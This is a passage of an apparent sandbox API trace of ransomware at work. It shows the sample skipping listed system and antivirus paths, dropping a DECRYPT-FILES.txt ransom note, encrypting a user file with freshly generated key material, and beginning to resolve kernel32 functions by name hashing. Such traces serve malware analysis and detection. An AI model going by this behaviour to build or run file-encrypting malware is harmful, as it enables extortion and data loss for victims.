ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Crash Reports", cAlternateFileName="CRASHR~1")) returned 1 [0080.559] lstrcmpW (lpString1="Crash Reports", lpString2=".") returned 1 [0080.559] lstrcmpW (lpString1="Crash Reports", lpString2="..") returned 1 [0080.559] lstrcatW (in: lpString1="Crash Reports", lpString2="\\" | out: lpString1="Crash Reports\\") returned="Crash Reports\\" [0080.559] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="Crash Reports\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\" [0080.559] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpSrch="\\Program Files") returned 0x0 [0080.559] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpSrch=":\\Windows") returned 0x0 [0080.559] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpSrch="\\Games\\") returned 0x0 [0080.559] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpSrch="\\Tor Browser\\") returned 0x0 [0080.559] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpSrch="\\ProgramData\\") returned 0x0 [0080.559] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0080.559] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0080.559] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0080.559] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpSrch="\\All Users") returned 0x0 [0080.559] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpSrch="\\IETldCache\\") returned 0x0 [0080.559] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpSrch="\\Local Settings\\") returned 0x0 [0080.559] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpSrch="\\AppData\\Local") returned 0x0 [0080.559] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpSrch="AhnLab") returned 0x0 [0080.559] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0080.559] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\") returned 76 [0080.559] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.559] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\\\jkbimi8.tmp") returned 88 [0080.559] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x450 [0080.561] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\") returned 76 [0080.561] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0080.561] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\\\DECRYPT-FILES.txt") returned 94 [0080.561] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0080.563] WriteFile (in: hFile=0x454, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2df3c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2df3c*=0x23fc, lpOverlapped=0x0) returned 1 [0080.564] CloseHandle (hObject=0x454) returned 1 [0080.564] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\") returned 76 [0080.564] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*" [0080.564] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*", lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xac3706e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac3706e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d18 [0080.564] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.564] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xac3706e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac3706e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.564] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.564] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.564] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac3706e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac3706e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac3706e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0080.564] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0080.564] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0xa, dwReserved0=0x0, dwReserved1=0x0, cFileName="InstallTime20131025151332", cAlternateFileName="INSTAL~1")) returned 1 [0080.564] lstrcmpiW (lpString1="InstallTime20131025151332", lpString2="DECRYPT-FILES.txt") returned 1 [0080.564] lstrcmpiW (lpString1="InstallTime20131025151332", lpString2="autorun.inf") returned 1 [0080.564] lstrcmpiW (lpString1="InstallTime20131025151332", lpString2="boot.ini") returned 1 [0080.564] lstrcmpiW (lpString1="InstallTime20131025151332", lpString2="desktop.ini") returned 1 [0080.564] lstrcmpiW (lpString1="InstallTime20131025151332", lpString2="ntuser.dat") returned -1 [0080.564] lstrcmpiW (lpString1="InstallTime20131025151332", lpString2="iconcache.db") returned 1 [0080.564] lstrcmpiW (lpString1="InstallTime20131025151332", lpString2="bootsect.bak") returned 1 [0080.564] lstrcmpiW (lpString1="InstallTime20131025151332", lpString2="ntuser.dat.log") returned -1 [0080.565] lstrcmpiW (lpString1="InstallTime20131025151332", lpString2="thumbs.db") returned -1 [0080.565] lstrcmpiW (lpString1="InstallTime20131025151332", lpString2="Bootfont.bin") returned 1 [0080.565] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\") returned 76 [0080.565] lstrlenW (lpString="InstallTime20131025151332") returned 25 [0080.565] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\" [0080.565] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpString2="InstallTime20131025151332" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332" [0080.565] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.565] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20131025151332"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x458 [0080.566] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x3f2d6f8 | out: lpFileSize=0x3f2d6f8*=10) returned 1 [0080.566] CreateFileMappingW (hFile=0x458, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x45c [0080.566] MapViewOfFile (hFileMappingObject=0x45c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0080.566] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0080.566] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0080.566] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0080.568] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x100) returned 1 [0080.568] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0080.568] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.569] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0080.569] CloseHandle (hObject=0x45c) returned 1 [0080.569] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.569] WriteFile (in: hFile=0x458, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d680, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d680*=0x108, lpOverlapped=0x0) returned 1 [0080.570] CloseHandle (hObject=0x0) returned 0 [0080.570] CloseHandle (hObject=0x458) returned 1 [0080.571] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.571] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.571] GetTickCount () returned 0x114ca13 [0080.571] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.572] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0080.572] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0080.572] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0080.572] lstrlenA (lpString="kernel32.dll") returned 12 [0080.572] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0080.572] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0080.572] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0080.572] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0080.572] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0080.573] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0080.573] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0080.573] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0080.573] lstrlenA (lpString="ADDATOMA") returned 8 [0080.573] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0080.573] lstrlenA (lpString="ADDATOMW") returned 8 [0080.573] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0080.573] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0080.573] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0080.573] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0080.573] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0080.573] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0080.573] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0080.573] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0080.573] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0080.573] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0080.573] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0080.573] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0080.573] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0080.573] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0080.573] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0080.573] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0080.573] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0080.573] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0080.573] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0080.573] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0080.573] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0080.573] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0080.573] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0080.573] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0080.573] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0080.573] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0080.573] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0080.573] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0080.573] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0080.573] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0080.574] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0080.574] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0080.574] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0080.574] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0080.574] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0080.574] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0080.574] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0080.574] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0080.574] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0080.574] lstrlenA (lpString="BACKUPREAD") returned 10 [0080.574] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0080.574] lstrlenA (lpString="BACKUPSEEK") returned 10 [0080.574] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0080.574] lstrlenA (lpString="BACKUPWRITE") returned 11 [0080.574] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0080.574] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0080.574] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0080.574] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0080.574] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0080.574] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0080.574] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0080.574] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0080.574] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0080.574] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0080.574] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0080.574] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0080.574] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0080.574] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0080.574] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0080.574] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0080.574] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0080.574] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0080.574] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0080.574] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0080.574] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0080.574] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0080.574] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0080.575] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0080.575] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0080.575] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0080.575] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0080.575] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0080.575] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0080.575] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0080.575] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0080.575] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0080.575] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0080.575] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0080.575] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0080.575] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0080.575] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0080.575] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0080.575] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0080.575] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0080.575] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0080.575] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0080.575] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0080.575] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0080.575] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0080.575] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0080.575] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0080.575] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0080.575] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0080.575] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0080.575] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0080.575] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0080.575] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0080.575] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0080.575] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0080.575] lstrlenA (lpString="BEEP") returned 4 [0080.575] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0080.575] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0080.575] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceW" | out: 